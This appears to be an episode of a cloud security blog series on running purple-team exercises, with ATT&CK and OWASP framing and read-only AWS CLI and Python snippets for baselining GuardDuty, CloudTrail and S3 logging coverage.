Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.

What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.

The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat
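
The MEASURE step produces two numbers per exercise: detection rate and mean time to detect. A minimal sketch of computing them, assuming one record per technique; the record layout and the results themselves are hypothetical:

```python
from statistics import mean

# Hypothetical results from one exercise: one record per technique executed.
results = [
    {"technique": "T1078", "detected": True, "minutes_to_detect": 12},
    {"technique": "T1530", "detected": True, "minutes_to_detect": 48},
    {"technique": "T1580", "detected": True, "minutes_to_detect": 30},
    {"technique": "T1098", "detected": False, "minutes_to_detect": None},
]


def summarize(results):
    """Detection rate over all techniques; mean time over the detected ones only."""
    detected = [r for r in results if r["detected"]]
    return {
        "detection_rate": len(detected) / len(results),
        "mean_minutes_to_detect": (
            mean(r["minutes_to_detect"] for r in detected) if detected else None
        ),
    }


summary = summarize(results)
print(summary)
```

Undetected techniques are excluded from the mean instead of being counted as zero, so a missed technique lowers the detection rate without flattering the time figure. Store the summary with the exercise date; it is the baseline the next exercise has to beat.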

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.

The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.
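
The coverage figure is set arithmetic over technique IDs. A short sketch that reproduces the 47-of-112 example, using placeholder IDs in place of real ATT&CK identifiers:

```python
def coverage_report(relevant: set, verified: set):
    """Return (covered, missing, percent covered) for the relevant techniques."""
    covered = relevant & verified
    missing = relevant - verified
    percent = round(100 * len(covered) / len(relevant), 1)
    return len(covered), len(missing), percent


# Placeholder IDs standing in for the techniques in your threat model.
relevant = {f"TECH-{n:03d}" for n in range(1, 113)}   # 112 relevant techniques
verified = {f"TECH-{n:03d}" for n in range(1, 48)}    # 47 with verified detections

covered, missing, percent = coverage_report(relevant, verified)
print(f"{covered} covered, {missing} not yet covered ({percent}% coverage)")
```

Intersecting with the relevant set means a detection verified for a technique outside your threat model does not inflate the number.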

Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Server-Side Request Forgery (A10) is the request that reaches the EC2 metadata endpoint.

The framing shifts. The categories don’t.

Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.

Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

# Count GuardDuty findings from the last 30 days, grouped by type (GNU date syntax)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)
aws guardduty list-findings \
  --detector-id "$DETECTOR_ID" \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id "$DETECTOR_ID" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'

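# List trails (HasCustomEventSelectors only says whether event selectors were customized)
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,CustomSelectors:HasCustomEventSelectors}' --output table
# Whether a trail is actually logging comes from get-trail-status; run once per trail
aws cloudtrail get-trail-status --name <trail-name> --query 'IsLogging'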

# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.

⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.
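
To confirm those basic techniques actually left a trail, the CloudTrail event history can be queried by event name. This is a minimal sketch: the three event names are examples picked for illustration, the function name `lookup_basic_events` is hypothetical, and it assumes GNU `date` as in the earlier commands.

```shell
#!/usr/bin/env bash
# Sketch: look up CloudTrail management events that basic techniques typically generate.
# Assumptions: the event names below are illustrative examples; GNU date is available.
# lookup-events is regional, and IAM events are generally recorded in us-east-1.
lookup_basic_events() {
  local since="${1:-1 hour ago}"
  local start
  start=$(date -u -d "$since" +%Y-%m-%dT%H:%M:%SZ)
  for event in ListBuckets CreateAccessKey AttachUserPolicy; do
    echo "== $event =="
    aws cloudtrail lookup-events \
      --lookup-attributes "AttributeKey=EventName,AttributeValue=$event" \
      --start-time "$start" \
      --query 'Events[].{Time:EventTime,User:Username,Event:EventName}' \
      --output table
  done
}

# Example: events from the last two hours
#   lookup_basic_events "2 hours ago"
```

If the red phase ran one of these actions and the lookup shows the event but no alert fired, the gap is in the detection rule rather than in logging.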

No documentation of the exercise environment state. If you tune a detection rule during an exercise and a later Terraform apply overwrites it, the improvement is lost. Commit every detection change from an exercise to version control immediately, so the infrastructure code and the tuned rule never diverge.

Quick Reference

Term	Definition
Purple team security	Practice of combined red/blue exercises where both teams improve detection together
MTTD	Mean Time to Detect — the primary metric purple team exercises reduce
ATT&CK	MITRE framework mapping adversary techniques to data sources and detections
Red phase	Attacker perspective: simulate the technique with real commands
Blue phase	Defender perspective: what detection fires (or doesn’t)
Purple phase	The joint debrief and immediate detection tuning that makes both better
Detection baseline	Measured MTTD and technique coverage before the first exercise
OWASP Top 10	Threat taxonomy used in this series — applies to infrastructure, not just web apps

Key Takeaways

Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
The metric that matters is detection time per technique — not findings count
Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
Every major cloud breach from 2020 to 2025 maps to an OWASP category, so those categories are the exercise backlog for any organization running in the cloud
Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.
